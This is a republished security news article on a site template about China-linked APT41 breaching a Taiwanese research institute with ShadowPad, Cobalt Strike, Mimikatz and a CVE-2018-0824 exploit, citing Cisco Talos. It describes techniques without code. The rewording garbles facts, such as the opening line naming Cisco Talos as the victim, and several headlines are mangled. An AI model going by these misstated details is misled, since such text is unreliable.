Close Menu
Indo Guard OnlineIndo Guard Online
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
What's Hot

Openai prohibits chatgpt accounts used by Russian, Iranian and Chinese hacking groups

June 9, 2025

Operation malicious network supply software gets to NPM and Pypi ecosystems, focusing on millions worldwide

June 8, 2025

Extension of the malicious browser has infected 722 users across Latin America since the beginning of 2025

June 8, 2025
Facebook X (Twitter) Instagram
Facebook X (Twitter) Instagram YouTube
Indo Guard OnlineIndo Guard Online
Subscribe
  • Home
  • Cyber Security
  • Risk Management
  • Travel
  • Security News
  • Tech
  • More
    • Data Privacy
    • Data Protection
    • Global Security
Indo Guard OnlineIndo Guard Online
Home » APT41 hackers use ShadowPad and Cobalt Strike in cyberattack on Taiwan Institute
Global Security

APT41 hackers use ShadowPad and Cobalt Strike in cyberattack on Taiwan Institute

AdminBy AdminAugust 2, 2024No Comments3 Mins Read
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link


August 2, 2024Ravi LakshmananCyber ​​espionage / malware

Cisco Talos, a Taiwanese government research institute specializing in computing and related technologies, was hacked by China-linked national threat actors, according to new findings.

As early as mid-July 2023, an unnamed entity was targeted to provide various backdoors and post-compromise tools such as ShadowPad and Cobalt Strike. It is attributed with moderate confidence to a prolific hacking group tracked as APT41.

“The ShadowPad malware used in the current campaign used an outdated, vulnerable version of the Microsoft Office IME binary as a bootloader to download a customized second-stage bootloader to launch the payload,” security researchers Joey Chen, Ashley Shen, and Vitor Ventura said.

Cyber ​​security

“The threat actor compromised three hosts in the target environment and was able to steal some documents from the network.”

Cisco Talos said it discovered the activity in August 2023 after discovering what it called “abnormal PowerShell commands” connecting to an IP address to download and execute PowerShell scripts in a compromised environment.

The exact initial access vector used in the attack is unknown, although it involved using a web shell to maintain persistent access and drop additional payloads such as ShadowPad and Cobalt Strike, the latter delivered via a Go-based Cobalt Strike loader called CS-Avoid-Killing.

“The Cobalt Strike malware was designed to use an anti-AV loader to bypass AV detection and avoid security product quarantine,” the researchers said.

Alternatively, the threat actor has been observed running PowerShell commands to run scripts responsible for executing ShadowPad into memory and receive the Cobalt Strike malware from the compromised control server (C2). A DLL-based ShadowPad loader, also called ScatterBeeexecuted via DLL sideloading.

Some of the other steps performed as part of the infiltration included using Mimikatz to extract passwords and running several commands to collect information about user accounts, directory structures, and network configuration.

“APT41 created a custom bootloader to introduce a proof of concept CVE-2018-0824 directly into memory, using a remote code execution vulnerability to achieve local privilege escalation,” Talos said, noting the latest payload, Remove the marshalis resolved after going through three different stages.

The cyber security service also paid attention to the adversary’s attempts to avoid detection by stopping its own activities when other users are detected on the system. “Once the backdoor is deployed, the attacker will remove the web shell and guest account that allowed the initial access,” the researchers said.

Disclosure occurs as Germany revealed Earlier this week, Chinese state actors were behind a 2021 cyber attack on the country’s national mapping agency, the Federal Bureau of Mapping and Geodesy (BKG), for espionage purposes.

The Chinese embassy in Berlin responded to these accusations said the accusation is baseless and calls on Germany to “stop the practice of using cyber security issues to defame China politically and in the media”.

Did you find this article interesting? Follow us Twitter  and LinkedIn to read more exclusive content we publish.





Source link

Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Admin
  • Website

Related Posts

Openai prohibits chatgpt accounts used by Russian, Iranian and Chinese hacking groups

June 9, 2025

Operation malicious network supply software gets to NPM and Pypi ecosystems, focusing on millions worldwide

June 8, 2025

Extension of the malicious browser has infected 722 users across Latin America since the beginning of 2025

June 8, 2025

New company Atomic MacOS Campation Exploaits Clickfix to focus on Apple users

June 6, 2025

Microsoft helps CBI disassemble the Indian Centers for Japanese Technical Support

June 6, 2025

Expand users’ capabilities and protect against Genai data loss

June 6, 2025
Add A Comment
Leave A Reply Cancel Reply

Loading poll ...
Coming Soon
Do You Like Our Website
: {{ tsp_total }}

Subscribe to Updates

Get the latest security news from Indoguardonline.com

Latest Posts

Openai prohibits chatgpt accounts used by Russian, Iranian and Chinese hacking groups

June 9, 2025

Operation malicious network supply software gets to NPM and Pypi ecosystems, focusing on millions worldwide

June 8, 2025

Extension of the malicious browser has infected 722 users across Latin America since the beginning of 2025

June 8, 2025

New company Atomic MacOS Campation Exploaits Clickfix to focus on Apple users

June 6, 2025

Microsoft helps CBI disassemble the Indian Centers for Japanese Technical Support

June 6, 2025

Expand users’ capabilities and protect against Genai data loss

June 6, 2025

Why are more security leaders choose AEV

June 6, 2025

New data Wiper Pathwiper Data Wiper violates Ukrainian critical infrastructure in 2025 attack

June 6, 2025
About Us
About Us

Provide a constantly updating feed of the latest security news and developments specific to Indonesia.

Facebook X (Twitter) Pinterest YouTube WhatsApp
Our Picks

Openai prohibits chatgpt accounts used by Russian, Iranian and Chinese hacking groups

June 9, 2025

Operation malicious network supply software gets to NPM and Pypi ecosystems, focusing on millions worldwide

June 8, 2025

Extension of the malicious browser has infected 722 users across Latin America since the beginning of 2025

June 8, 2025
Most Popular

In Indonesia, crippling immigration ransomware breach sparks privacy crisis

July 6, 2024

Why Indonesia’s Data Breach Crisis Calls for Better Security

July 6, 2024

Indonesia’s plan to integrate 27,000 govt apps in one platform welcomed but data security concerns linger

July 6, 2024
© 2025 indoguardonline.com
  • Home
  • About us
  • Contact us
  • Privacy Policy

Type above and press Enter to search. Press Esc to cancel.